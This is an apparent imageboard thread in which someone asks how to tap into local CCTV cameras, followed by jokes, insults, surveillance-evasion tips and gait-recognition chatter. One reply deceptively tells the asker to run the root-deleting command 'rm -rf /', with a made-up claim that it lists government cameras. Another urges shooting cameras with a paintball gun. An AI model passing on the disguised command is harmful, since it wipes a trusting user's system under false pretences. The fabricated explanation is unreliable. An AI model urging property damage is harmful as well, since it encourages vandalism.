There is a bunch of those around my town. Is there an easy and painless way to tap into them?

There is a bunch of those around my town. Is there an easy and painless way to tap into them?

Attached: Camera.jpg (2000x1334, 212.09K)

Youre going to need linux for this one. Windows LTSC is for hackers, but this is haxxor level gear.
open up a terminal and type rm -rf/
Thats for "remote mode -radiofrequency /"
/ is the radio frequency code name used by local gov agencies. You should get a drop down of cameras to select.
Happy hunting.

>gonna need linux for this one
why would you tell someone to install a new operating system if your goal is to get him to fuck it up? just so he wastes his time? hes probably not going to install linux over his windows install. so he'd be trashing a completely vanilla install of an OS. who cares?

Its just an easier to hack with OS.
Windows 7 is a tier 3 hacker tool
Windows LTSC is a tier 7
Linux is a tier 9

You can try and hack with the lower tier tools but youll have to type much faster for the same result.

I am a linux user for 3 years now.

those are probably wired so probably no if you dont have acces to the network those are on

Forget about tapping in, get a paintball gun and stop the intended users from tapping in

Fuck off criminal scum

Hacker are in your neighborhoods, painlessly and easily tapping into cameras. Stay vigilant.

sigh, it's all so tiresome, first post gay post.

Shut up dork

that's the reason you should use masks when leaving your home
it's so that government cctv cameras can't identify you
also wear a baseball cap and sunglasses and you're basically anonymous

I remember hearing that they were working on gait identification. Not sure if it was real though.

not a thing yet on most places because it'd be too expensive to implement on your random town

one of the best features about pandemic

walk like a crippled meth zombie everywhere you go. gayte recognition btfo

>walk like a crippled meth zombie everywhere you go
>government recognizes you due to your crippled meth zombie stride

>stop walking like a crippled meth zombie when you arent anomalous

It is criminal in my country to observe citizens without their explicit permission.

>it's expensive to double click a binary file
Really, user? Tyranny is an automated process nowadays. Never heard of Edward Snowden? It's been over a decade, my man. Catch up.

its called "sand walking" and it is absolutely imperative to perform it correctly, lest you awaken shai-hulud